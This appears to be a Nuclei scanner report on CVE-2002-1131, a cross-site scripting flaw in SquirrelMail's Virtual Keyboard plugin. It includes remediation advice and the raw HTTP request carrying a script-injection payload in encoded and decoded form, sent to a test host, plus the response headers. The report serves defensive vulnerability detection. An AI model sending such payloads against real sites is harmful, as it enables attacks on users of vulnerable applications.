The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Remediation
Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.4 Safari/604.4.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 315
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT
GET /src/addressbook.php?</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.4 Safari/604.4.1
Details: CVE-2002-1131 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024
Template Information
Request
Response
References:
CURL command
Generated by Nuclei v3.2.5